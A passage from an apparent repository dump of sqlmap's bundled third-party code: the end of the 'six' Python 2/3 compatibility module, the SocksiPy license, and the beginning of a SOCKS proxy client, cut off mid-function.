\"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"uses_query\", \"urlparse\", \"urllib.parse\"),\n    MovedAttribute(\"uses_relative\", \"urlparse\", \"urllib.parse\"),\n]\nfor attr in _urllib_parse_moved_attributes:\n    setattr(Module_six_moves_urllib_parse, attr.name, attr)\ndel attr\n\nModule_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes\n\n_importer._add_module(Module_six_moves_urllib_parse(__name__ + \".moves.urllib_parse\"),\n                      \"moves.urllib_parse\", \"moves.urllib.parse\")\n\n\nclass Module_six_moves_urllib_error(_LazyModule):\n\n    \"\"\"Lazy loading of moved objects in six.moves.urllib_error\"\"\"\n\n\n_urllib_error_moved_attributes = [\n    MovedAttribute(\"URLError\", \"urllib2\", \"urllib.error\"),\n    MovedAttribute(\"HTTPError\", \"urllib2\", \"urllib.error\"),\n    MovedAttribute(\"ContentTooShortError\", \"urllib\", \"urllib.error\"),\n]\nfor attr in _urllib_error_moved_attributes:\n    setattr(Module_six_moves_urllib_error, attr.name, attr)\ndel attr\n\nModule_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes\n\n_importer._add_module(Module_six_moves_urllib_error(__name__ + \".moves.urllib.error\"),\n                      \"moves.urllib_error\", \"moves.urllib.error\")\n\n\nclass Module_six_moves_urllib_request(_LazyModule):\n\n    \"\"\"Lazy loading of moved objects in six.moves.urllib_request\"\"\"\n\n\n_urllib_request_moved_attributes = [\n    MovedAttribute(\"urlopen\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"install_opener\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"build_opener\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"pathname2url\", \"urllib\", \"urllib.request\"),\n    MovedAttribute(\"url2pathname\", \"urllib\", \"urllib.request\"),\n    MovedAttribute(\"getproxies\", \"urllib\", \"urllib.request\"),\n    MovedAttribute(\"Request\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"OpenerDirector\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"HTTPDefaultErrorHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"HTTPRedirectHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"HTTPCookieProcessor\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"ProxyHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"BaseHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"HTTPPasswordMgr\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"HTTPPasswordMgrWithDefaultRealm\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"AbstractBasicAuthHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"HTTPBasicAuthHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"ProxyBasicAuthHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"AbstractDigestAuthHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"HTTPDigestAuthHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"ProxyDigestAuthHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"HTTPHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"HTTPSHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"FileHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"FTPHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"CacheFTPHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"UnknownHandler\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"HTTPErrorProcessor\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"urlretrieve\", \"urllib\", \"urllib.request\"),\n    MovedAttribute(\"urlcleanup\", \"urllib\", \"urllib.request\"),\n    MovedAttribute(\"URLopener\", \"urllib\", \"urllib.request\"),\n    MovedAttribute(\"FancyURLopener\", \"urllib\", \"urllib.request\"),\n    MovedAttribute(\"proxy_bypass\", \"urllib\", \"urllib.request\"),\n    MovedAttribute(\"parse_http_list\", \"urllib2\", \"urllib.request\"),\n    MovedAttribute(\"parse_keqv_list\", \"urllib2\", \"urllib.request\"),\n]\nfor attr in _urllib_request_moved_attributes:\n    setattr(Module_six_moves_urllib_request, attr.name, attr)\ndel attr\n\nModule_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes\n\n_importer._add_module(Module_six_moves_urllib_request(__name__ + \".moves.urllib.request\"),\n                      \"moves.urllib_request\", \"moves.urllib.request\")\n\n\nclass Module_six_moves_urllib_response(_LazyModule):\n\n    \"\"\"Lazy loading of moved objects in six.moves.urllib_response\"\"\"\n\n\n_urllib_response_moved_attributes = [\n    MovedAttribute(\"addbase\", \"urllib\", \"urllib.response\"),\n    MovedAttribute(\"addclosehook\", \"urllib\", \"urllib.response\"),\n    MovedAttribute(\"addinfo\", \"urllib\", \"urllib.response\"),\n    MovedAttribute(\"addinfourl\", \"urllib\", \"urllib.response\"),\n]\nfor attr in _urllib_response_moved_attributes:\n    setattr(Module_six_moves_urllib_response, attr.name, attr)\ndel attr\n\nModule_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes\n\n_importer._add_module(Module_six_moves_urllib_response(__name__ + \".moves.urllib.response\"),\n                      \"moves.urllib_response\", \"moves.urllib.response\")\n\n\nclass Module_six_moves_urllib_robotparser(_LazyModule):\n\n    \"\"\"Lazy loading of moved objects in six.moves.urllib_robotparser\"\"\"\n\n\n_urllib_robotparser_moved_attributes = [\n    MovedAttribute(\"RobotFileParser\", \"robotparser\", \"urllib.robotparser\"),\n]\nfor attr in _urllib_robotparser_moved_attributes:\n    setattr(Module_six_moves_urllib_robotparser, attr.name, attr)\ndel attr\n\nModule_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes\n\n_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + \".moves.urllib.robotparser\"),\n                      \"moves.urllib_robotparser\", \"moves.urllib.robotparser\")\n\n\nclass Module_six_moves_urllib(types.ModuleType):\n\n    \"\"\"Create a six.moves.urllib namespace that resembles the Python 3 namespace\"\"\"\n    __path__ = []  # mark as package\n    parse = _importer._get_module(\"moves.urllib_parse\")\n    error = _importer._get_module(\"moves.urllib_error\")\n    request = _importer._get_module(\"moves.urllib_request\")\n    response = _importer._get_module(\"moves.urllib_response\")\n    robotparser = _importer._get_module(\"moves.urllib_robotparser\")\n\n    def __dir__(self):\n        return ['parse', 'error', 'request', 'response', 'robotparser']\n\n_importer._add_module(Module_six_moves_urllib(__name__ + \".moves.urllib\"),\n                      \"moves.urllib\")\n\n\ndef add_move(move):\n    \"\"\"Add an item to six.moves.\"\"\"\n    setattr(_MovedItems, move.name, move)\n\n\ndef remove_move(name):\n    \"\"\"Remove item from six.moves.\"\"\"\n    try:\n        delattr(_MovedItems, name)\n    except AttributeError:\n        try:\n            del moves.__dict__[name]\n        except KeyError:\n            raise AttributeError(\"no such move, %r\" % (name,))\n\n\nif PY3:\n    _meth_func = \"__func__\"\n    _meth_self = \"__self__\"\n\n    _func_closure = \"__closure__\"\n    _func_code = \"__code__\"\n    _func_defaults = \"__defaults__\"\n    _func_globals = \"__globals__\"\nelse:\n    _meth_func = \"im_func\"\n    _meth_self = \"im_self\"\n\n    _func_closure = \"func_closure\"\n    _func_code = \"func_code\"\n    _func_defaults = \"func_defaults\"\n    _func_globals = \"func_globals\"\n\n\ntry:\n    advance_iterator = next\nexcept NameError:\n    def advance_iterator(it):\n        return it.next()\nnext = advance_iterator\n\n\ntry:\n    callable = callable\nexcept NameError:\n    def callable(obj):\n        return any(\"__call__\" in klass.__dict__ for klass in type(obj).__mro__)\n\n\nif PY3:\n    def get_unbound_function(unbound):\n        return unbound\n\n    create_bound_method = types.MethodType\n\n    def create_unbound_method(func, cls):\n        return func\n\n    Iterator = object\nelse:\n    def get_unbound_function(unbound):\n        return unbound.im_func\n\n    def create_bound_method(func, obj):\n        return types.MethodType(func, obj, obj.__class__)\n\n    def create_unbound_method(func, cls):\n        return types.MethodType(func, None, cls)\n\n    class Iterator(object):\n\n        def next(self):\n            return type(self).__next__(self)\n\n    callable = callable\n_add_doc(get_unbound_function,\n         \"\"\"Get the function out of a possibly unbound function\"\"\")\n\n\nget_method_function = operator.attrgetter(_meth_func)\nget_method_self = operator.attrgetter(_meth_self)\nget_function_closure = operator.attrgetter(_func_closure)\nget_function_code = operator.attrgetter(_func_code)\nget_function_defaults = operator.attrgetter(_func_defaults)\nget_function_globals = operator.attrgetter(_func_globals)\n\n\nif PY3:\n    def iterkeys(d, **kw):\n        return iter(d.keys(**kw))\n\n    def itervalues(d, **kw):\n        return iter(d.values(**kw))\n\n    def iteritems(d, **kw):\n        return iter(d.items(**kw))\n\n    def iterlists(d, **kw):\n        return iter(d.lists(**kw))\n\n    viewkeys = operator.methodcaller(\"keys\")\n\n    viewvalues = operator.methodcaller(\"values\")\n\n    viewitems = operator.methodcaller(\"items\")\nelse:\n    def iterkeys(d, **kw):\n        return d.iterkeys(**kw)\n\n    def itervalues(d, **kw):\n        return d.itervalues(**kw)\n\n    def iteritems(d, **kw):\n        return d.iteritems(**kw)\n\n    def iterlists(d, **kw):\n        return d.iterlists(**kw)\n\n    viewkeys = operator.methodcaller(\"viewkeys\")\n\n    viewvalues = operator.methodcaller(\"viewvalues\")\n\n    viewitems = operator.methodcaller(\"viewitems\")\n\n_add_doc(iterkeys, \"Return an iterator over the keys of a dictionary.\")\n_add_doc(itervalues, \"Return an iterator over the values of a dictionary.\")\n_add_doc(iteritems,\n         \"Return an iterator over the (key, value) pairs of a dictionary.\")\n_add_doc(iterlists,\n         \"Return an iterator over the (key, [values]) pairs of a dictionary.\")\n\n\nif PY3:\n    def b(s):\n        return s.encode(\"latin-1\")\n\n    def u(s):\n        return s\n    unichr = chr\n    import struct\n    int2byte = struct.Struct(\">B\").pack\n    del struct\n    byte2int = operator.itemgetter(0)\n    indexbytes = operator.getitem\n    iterbytes = iter\n    import io\n    StringIO = io.StringIO\n    BytesIO = io.BytesIO\n    del io\n    _assertCountEqual = \"assertCountEqual\"\n    if sys.version_info[1] <= 1:\n        _assertRaisesRegex = \"assertRaisesRegexp\"\n        _assertRegex = \"assertRegexpMatches\"\n        _assertNotRegex = \"assertNotRegexpMatches\"\n    else:\n        _assertRaisesRegex = \"assertRaisesRegex\"\n        _assertRegex = \"assertRegex\"\n        _assertNotRegex = \"assertNotRegex\"\nelse:\n    def b(s):\n        return s\n    # Workaround for standalone backslash\n\n    def u(s):\n        return unicode(s.replace(r'\\\\', r'\\\\\\\\'), \"unicode_escape\")\n    unichr = unichr\n    int2byte = chr\n\n    def byte2int(bs):\n        return ord(bs[0])\n\n    def indexbytes(buf, i):\n        return ord(buf[i])\n    iterbytes = functools.partial(itertools.imap, ord)\n    import StringIO\n    StringIO = BytesIO = StringIO.StringIO\n    _assertCountEqual = \"assertItemsEqual\"\n    _assertRaisesRegex = \"assertRaisesRegexp\"\n    _assertRegex = \"assertRegexpMatches\"\n    _assertNotRegex = \"assertNotRegexpMatches\"\n_add_doc(b, \"\"\"Byte literal\"\"\")\n_add_doc(u, \"\"\"Text literal\"\"\")\n\n\ndef assertCountEqual(self, *args, **kwargs):\n    return getattr(self, _assertCountEqual)(*args, **kwargs)\n\n\ndef assertRaisesRegex(self, *args, **kwargs):\n    return getattr(self, _assertRaisesRegex)(*args, **kwargs)\n\n\ndef assertRegex(self, *args, **kwargs):\n    return getattr(self, _assertRegex)(*args, **kwargs)\n\n\ndef assertNotRegex(self, *args, **kwargs):\n    return getattr(self, _assertNotRegex)(*args, **kwargs)\n\n\nif PY3:\n    exec_ = getattr(moves.builtins, \"exec\")\n\n    def reraise(tp, value, tb=None):\n        try:\n            if value is None:\n                value = tp()\n            if value.__traceback__ is not tb:\n                raise value.with_traceback(tb)\n            raise value\n        finally:\n            value = None\n            tb = None\n\nelse:\n    def exec_(_code_, _globs_=None, _locs_=None):\n        \"\"\"Execute code in a namespace.\"\"\"\n        if _globs_ is None:\n            frame = sys._getframe(1)\n            _globs_ = frame.f_globals\n            if _locs_ is None:\n                _locs_ = frame.f_locals\n            del frame\n        elif _locs_ is None:\n            _locs_ = _globs_\n        exec(\"\"\"exec _code_ in _globs_, _locs_\"\"\")\n\n    exec_(\"\"\"def reraise(tp, value, tb=None):\n    try:\n        raise tp, value, tb\n    finally:\n        tb = None\n\"\"\")\n\n\nif sys.version_info[:2] > (3,):\n    exec_(\"\"\"def raise_from(value, from_value):\n    try:\n        raise value from from_value\n    finally:\n        value = None\n\"\"\")\nelse:\n    def raise_from(value, from_value):\n        raise value\n\n\nprint_ = getattr(moves.builtins, \"print\", None)\nif print_ is None:\n    def print_(*args, **kwargs):\n        \"\"\"The new-style print function for Python 2.4 and 2.5.\"\"\"\n        fp = kwargs.pop(\"file\", sys.stdout)\n        if fp is None:\n            return\n\n        def write(data):\n            if not isinstance(data, basestring):\n                data = str(data)\n            # If the file has an encoding, encode unicode with it.\n            if (isinstance(fp, file) and\n                    isinstance(data, unicode) and\n                    fp.encoding is not None):\n                errors = getattr(fp, \"errors\", None)\n                if errors is None:\n                    errors = \"strict\"\n                data = data.encode(fp.encoding, errors)\n            fp.write(data)\n        want_unicode = False\n        sep = kwargs.pop(\"sep\", None)\n        if sep is not None:\n            if isinstance(sep, unicode):\n                want_unicode = True\n            elif not isinstance(sep, str):\n                raise TypeError(\"sep must be None or a string\")\n        end = kwargs.pop(\"end\", None)\n        if end is not None:\n            if isinstance(end, unicode):\n                want_unicode = True\n            elif not isinstance(end, str):\n                raise TypeError(\"end must be None or a string\")\n        if kwargs:\n            raise TypeError(\"invalid keyword arguments to print()\")\n        if not want_unicode:\n            for arg in args:\n                if isinstance(arg, unicode):\n                    want_unicode = True\n                    break\n        if want_unicode:\n            newline = unicode(\"\\n\")\n            space = unicode(\" \")\n        else:\n            newline = \"\\n\"\n            space = \" \"\n        if sep is None:\n            sep = space\n        if end is None:\n            end = newline\n        for i, arg in enumerate(args):\n            if i:\n                write(sep)\n            write(arg)\n        write(end)\nif sys.version_info[:2] < (3, 3):\n    _print = print_\n\n    def print_(*args, **kwargs):\n        fp = kwargs.get(\"file\", sys.stdout)\n        flush = kwargs.pop(\"flush\", False)\n        _print(*args, **kwargs)\n        if flush and fp is not None:\n            fp.flush()\n\n_add_doc(reraise, \"\"\"Reraise an exception.\"\"\")\n\nif sys.version_info[0:2] < (3, 4):\n    # This does exactly the same what the :func:`py3:functools.update_wrapper`\n    # function does on Python versions after 3.2. It sets the ``__wrapped__``\n    # attribute on ``wrapper`` object and it doesn't raise an error if any of\n    # the attributes mentioned in ``assigned`` and ``updated`` are missing on\n    # ``wrapped`` object.\n    def _update_wrapper(wrapper, wrapped,\n                        assigned=functools.WRAPPER_ASSIGNMENTS,\n                        updated=functools.WRAPPER_UPDATES):\n        for attr in assigned:\n            try:\n                value = getattr(wrapped, attr)\n            except AttributeError:\n                continue\n            else:\n                setattr(wrapper, attr, value)\n        for attr in updated:\n            getattr(wrapper, attr).update(getattr(wrapped, attr, {}))\n        wrapper.__wrapped__ = wrapped\n        return wrapper\n    _update_wrapper.__doc__ = functools.update_wrapper.__doc__\n\n    def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS,\n              updated=functools.WRAPPER_UPDATES):\n        return functools.partial(_update_wrapper, wrapped=wrapped,\n                                 assigned=assigned, updated=updated)\n    wraps.__doc__ = functools.wraps.__doc__\n\nelse:\n    wraps = functools.wraps\n\n\ndef with_metaclass(meta, *bases):\n    \"\"\"Create a base class with a metaclass.\"\"\"\n    # This requires a bit of explanation: the basic idea is to make a dummy\n    # metaclass for one level of class instantiation that replaces itself with\n    # the actual metaclass.\n    class metaclass(type):\n\n        def __new__(cls, name, this_bases, d):\n            if sys.version_info[:2] >= (3, 7):\n                # This version introduced PEP 560 that requires a bit\n                # of extra care (we mimic what is done by __build_class__).\n                resolved_bases = types.resolve_bases(bases)\n                if resolved_bases is not bases:\n                    d['__orig_bases__'] = bases\n            else:\n                resolved_bases = bases\n            return meta(name, resolved_bases, d)\n\n        @classmethod\n        def __prepare__(cls, name, this_bases):\n            return meta.__prepare__(name, bases)\n    return type.__new__(metaclass, 'temporary_class', (), {})\n\n\ndef add_metaclass(metaclass):\n    \"\"\"Class decorator for creating a class with a metaclass.\"\"\"\n    def wrapper(cls):\n        orig_vars = cls.__dict__.copy()\n        slots = orig_vars.get('__slots__')\n        if slots is not None:\n            if isinstance(slots, str):\n                slots = [slots]\n            for slots_var in slots:\n                orig_vars.pop(slots_var)\n        orig_vars.pop('__dict__', None)\n        orig_vars.pop('__weakref__', None)\n        if hasattr(cls, '__qualname__'):\n            orig_vars['__qualname__'] = cls.__qualname__\n        return metaclass(cls.__name__, cls.__bases__, orig_vars)\n    return wrapper\n\n\ndef ensure_binary(s, encoding='utf-8', errors='strict'):\n    \"\"\"Coerce **s** to six.binary_type.\n\n    For Python 2:\n      - `unicode` -> encoded to `str`\n      - `str` -> `str`\n\n    For Python 3:\n      - `str` -> encoded to `bytes`\n      - `bytes` -> `bytes`\n    \"\"\"\n    if isinstance(s, binary_type):\n        return s\n    if isinstance(s, text_type):\n        return s.encode(encoding, errors)\n    raise TypeError(\"not expecting type '%s'\" % type(s))\n\n\ndef ensure_str(s, encoding='utf-8', errors='strict'):\n    \"\"\"Coerce *s* to `str`.\n\n    For Python 2:\n      - `unicode` -> encoded to `str`\n      - `str` -> `str`\n\n    For Python 3:\n      - `str` -> `str`\n      - `bytes` -> decoded to `str`\n    \"\"\"\n    # Optimization: Fast return for the common case.\n    if type(s) is str:\n        return s\n    if PY2 and isinstance(s, text_type):\n        return s.encode(encoding, errors)\n    elif PY3 and isinstance(s, binary_type):\n        return s.decode(encoding, errors)\n    elif not isinstance(s, (text_type, binary_type)):\n        raise TypeError(\"not expecting type '%s'\" % type(s))\n    return s\n\n\ndef ensure_text(s, encoding='utf-8', errors='strict'):\n    \"\"\"Coerce *s* to six.text_type.\n\n    For Python 2:\n      - `unicode` -> `unicode`\n      - `str` -> `unicode`\n\n    For Python 3:\n      - `str` -> `str`\n      - `bytes` -> decoded to `str`\n    \"\"\"\n    if isinstance(s, binary_type):\n        return s.decode(encoding, errors)\n    elif isinstance(s, text_type):\n        return s\n    else:\n        raise TypeError(\"not expecting type '%s'\" % type(s))\n\n\ndef python_2_unicode_compatible(klass):\n    \"\"\"\n    A class decorator that defines __unicode__ and __str__ methods under Python 2.\n    Under Python 3 it does nothing.\n\n    To support Python 2 and 3 with a single code base, define a __str__ method\n    returning text and apply this decorator to the class.\n    \"\"\"\n    if PY2:\n        if '__str__' not in klass.__dict__:\n            raise ValueError(\"@python_2_unicode_compatible cannot be applied \"\n                             \"to %s because it doesn't define __str__().\" %\n                             klass.__name__)\n        klass.__unicode__ = klass.__str__\n        klass.__str__ = lambda self: self.__unicode__().encode('utf-8')\n    return klass\n\n\n# Complete the moves implementation.\n# This code is at the end of this module to speed up module loading.\n# Turn this module into a package.\n__path__ = []  # required for PEP 302 and PEP 451\n__package__ = __name__  # see PEP 366 @ReservedAssignment\nif globals().get(\"__spec__\") is not None:\n    __spec__.submodule_search_locations = []  # PEP 451 @UndefinedVariable\n# Remove other six meta path importers, since they cause problems. This can\n# happen if six is removed from sys.modules and then reloaded. (Setuptools does\n# this for some reason.)\nif sys.meta_path:\n    for i, importer in enumerate(sys.meta_path):\n        # Here's some real nastiness: Another \"instance\" of the six module might\n        # be floating around. Therefore, we can't use isinstance() to check for\n        # the six meta path importer, since the other six instance will have\n        # inserted an importer with different class.\n        if (type(importer).__name__ == \"_SixMetaPathImporter\" and\n                importer.name == __name__):\n            del sys.meta_path[i]\n            break\n    del i, importer\n# Finally, add the importer to the meta path import hook.\nsys.meta_path.append(_importer)\n"
  },
  {
    "path": "sqlmap/thirdparty/socks/LICENSE",
    "content": "Copyright 2006 Dan-Haim. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n1. Redistributions of source code must retain the above copyright notice, this\n   list of conditions and the following disclaimer.\n2. Redistributions in binary form must reproduce the above copyright notice,\n   this list of conditions and the following disclaimer in the documentation\n   and/or other materials provided with the distribution.\n3. Neither the name of Dan Haim nor the names of his contributors may be used\n   to endorse or promote products derived from this software without specific\n   prior written permission.\n   \nTHIS SOFTWARE IS PROVIDED BY DAN HAIM \"AS IS\" AND ANY EXPRESS OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO\nEVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA\nOR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\nOF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE.\n"
  },
  {
    "path": "sqlmap/thirdparty/socks/__init__.py",
    "content": ""
  },
  {
    "path": "sqlmap/thirdparty/socks/socks.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"SocksiPy - Python SOCKS module.\nVersion 1.00\n\nCopyright 2006 Dan-Haim. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n1. Redistributions of source code must retain the above copyright notice, this\n   list of conditions and the following disclaimer.\n2. Redistributions in binary form must reproduce the above copyright notice,\n   this list of conditions and the following disclaimer in the documentation\n   and/or other materials provided with the distribution.\n3. Neither the name of Dan Haim nor the names of his contributors may be used\n   to endorse or promote products derived from this software without specific\n   prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY DAN HAIM \"AS IS\" AND ANY EXPRESS OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO\nEVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA\nOR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\nOF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE.\n\n\nThis module provides a standard socket-like interface for Python\nfor tunneling connections through SOCKS proxies.\n\n\"\"\"\n\n\"\"\"\nMinor modifications made by Miroslav Stampar (https://sqlmap.org/)\nfor patching DNS-leakage occuring in socket.create_connection()\n\nMinor modifications made by Christopher Gilbert (http://motomastyle.com/)\nfor use in PyLoris (http://pyloris.sourceforge.net/)\n\nMinor modifications made by Mario Vilas (http://breakingcode.wordpress.com/)\nmainly to merge bug fixes found in Sourceforge\n\n\"\"\"\n\nimport socket\nimport struct\n\nPROXY_TYPE_SOCKS4 = 1\nPROXY_TYPE_SOCKS5 = 2\nPROXY_TYPE_HTTP = 3\n\n_defaultproxy = None\nsocket._orig_socket = _orgsocket = _orig_socket = socket.socket\n_orgcreateconnection = socket.create_connection\n\nclass ProxyError(Exception): pass\nclass GeneralProxyError(ProxyError): pass\nclass Socks5AuthError(ProxyError): pass\nclass Socks5Error(ProxyError): pass\nclass Socks4Error(ProxyError): pass\nclass HTTPError(ProxyError): pass\n\n_generalerrors = (\"success\",\n    \"invalid data\",\n    \"not connected\",\n    \"not available\",\n    \"bad proxy type\",\n    \"bad input\")\n\n_socks5errors = (\"succeeded\",\n    \"general SOCKS server failure\",\n    \"connection not allowed by ruleset\",\n    \"Network unreachable\",\n    \"Host unreachable\",\n    \"Connection refused\",\n    \"TTL expired\",\n    \"Command not supported\",\n    \"Address type not supported\",\n    \"Unknown error\")\n\n_socks5autherrors = (\"succeeded\",\n    \"authentication is required\",\n    \"all offered authentication methods were rejected\",\n    \"unknown username or invalid password\",\n    \"unknown error\")\n\n_socks4errors = (\"request granted\",\n    \"request rejected or failed\",\n    \"request rejected because SOCKS server cannot connect to identd on the client\",\n    \"request rejected because the client program and identd report different user-ids\",\n    \"unknown error\")\n\ndef setdefaultproxy(proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):\n    \"\"\"setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]])\n    Sets a default proxy which all further socksocket objects will use,\n    unless explicitly changed.\n    \"\"\"\n    global _defaultproxy\n    _defaultproxy = (proxytype, addr, port, rdns, username, password)\n\ndef wrapmodule(module):\n    \"\"\"wrapmodule(module)\n    Attempts to replace a module's socket library with a SOCKS socket. Must set\n    a default proxy using setdefaultproxy(...) first.\n    This will only work on modules that import socket directly into the namespace;\n    most of the Python Standard Library falls into this category.\n    \"\"\"\n    if _defaultproxy != None:\n        module.socket.socket = socksocket\n        if _defaultproxy[0] == PROXY_TYPE_SOCKS4:\n            # Note: unable to prevent DNS leakage in SOCKS4 (Reference: https://security.stackexchange.com/a/171280)\n            pass\n        else:\n            module.socket.create_connection = create_connection\n    else:\n        raise GeneralProxyError((4, \"no proxy specified\"))\n\ndef unwrapmodule(module):\n    module.socket.socket = _orgsocket\n    module.socket.create_connection = _orgcreateconnection\n\nclass socksocket(socket.socket):\n    \"\"\"socksocket([family[, type[, proto]]]) -> socket object\n    Open a SOCKS enabled socket. The parameters are the same as\n    those of the standard socket init. In order for SOCKS to work,\n    you must specify family=AF_INET, type=SOCK_STREAM and proto=0.\n    \"\"\"\n\n    def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None):\n        _orgsocket.__init__(self, family, type, proto, _sock)\n        if _defaultproxy != None:\n            self.__proxy = _defaultproxy\n        else:\n            self.__proxy = (None, None, None, None, None, None)\n        self.__proxysockname = None\n        self.__proxypeername = None\n\n    def __recvall(self, count):\n        \"\"\"__recvall(count) -> data\n        Receive EXACTLY the number of bytes requested from the socket.\n        Blocks until the required number of bytes have been received.\n        \"\"\"\n        data = self.recv(count)\n        while len(data) < count:\n            d = self.recv(count-len(data))\n            if not d: raise GeneralProxyError((0, \"connection closed unexpectedly\"))\n            data = data + d\n        return data\n\n    def setproxy(self, proxytype=None, addr=None, port=None, rdns=True, username=None, password=None):\n        \"\"\"setproxy(proxytype, addr[, port[, rdns[, username[, password]]]])\n        Sets the proxy to be used.\n        proxytype -    The type of the proxy to be used. Three types\n                are supported: PROXY_TYPE_SOCKS4 (including socks4a),\n                PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP\n        addr -        The address of the server (IP or DNS).\n        port -        The port of the server. Defaults to 1080 for SOCKS\n                servers and 8080 for HTTP proxy servers.\n        rdns -        Should DNS queries be preformed on the remote side\n                (rather than the local side). The default is True.\n                Note: This has no effect with SOCKS4 servers.\n        username -    Username to authenticate with to the server.\n                The default is no authentication.\n        password -    Password to authenticate with to the server.\n                Only relevant when username is also provided.\n        \"\"\"\n        self.__proxy = (proxytype, addr, port, rdns, username, password)\n\n    def __negotiatesocks5(self, destaddr, destport):\n        \"\"\"__negotiatesocks5(self,destaddr,destport)\n        Negotiates a connection through a SOCKS5 server.\n        \"\"\"\n        # First we'll send the authentication packages we support.\n        if (self.__proxy[4]!=None) and (self.__proxy[5]!=None):\n            # The username/password details were supplied to the\n            # setproxy method so we support the USERNAME/PASSWORD\n            # authentication (in addition to the standard none).\n            self.sendall(struct.pack('BBBB', 0x05, 0x02, 0x00, 0x02))\n        else:\n            # No username/password were entered, therefore we\n            # only support connections with no authentication.\n            self.sendall(struct.pack('BBB', 0x05, 0x01, 0x00))\n        # We'll receive the server's response to determine which\n        # method was selected\n        chosenauth = self.__recvall(2)\n        if chosenauth[0:1] != chr(0x05).encode():\n            self.close()\n            raise GeneralProxyError((1, _generalerrors[1]))\n        # Check the chosen authentication method\n        if chosenauth[1:2] == chr(0x00).encode():\n            # No authentication is required\n            pass\n        elif chosenauth[1:2] == chr(0x02).encode():\n            # Okay, we need to perform a basic username/password\n            # authentication.\n            self.sendall(chr(0x01).encode() + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.__proxy[5])) + self.__proxy[5])\n            authstat = self.__recvall(2)\n            if authstat[0:1] != chr(0x01).encode():\n                # Bad response\n                self.close()\n                raise GeneralProxyError((1, _generalerrors[1]))\n            if authstat[1:2] != chr(0x00).encode():\n                # Authentication failed\n                self.close()\n                raise Socks5AuthError((3, _socks5autherrors[3]))\n            # Authentication succeeded\n        else:\n            # Reaching here is always bad\n            self.close()\n            if chosenauth[1] == chr(0xFF).encode():\n                raise Socks5AuthError((2, _socks5autherrors[2]))\n            else:\n                raise GeneralProxyError((1, _generalerrors[1]))\n        # Now we can request the actual connection\n        req = struct.pack('BBB', 0x05, 0x01, 0x00)\n        # If the given destination address is an IP address, we'll\n        # use the IPv4 address request even if remote resolving was specified.\n        try:\n            ipaddr = socket.inet_aton(destaddr)\n            req = req + chr(0x01).encode() + ipaddr\n        except socket.error:\n            # Well it's not an IP number,  so it's probably a DNS name.\n            if 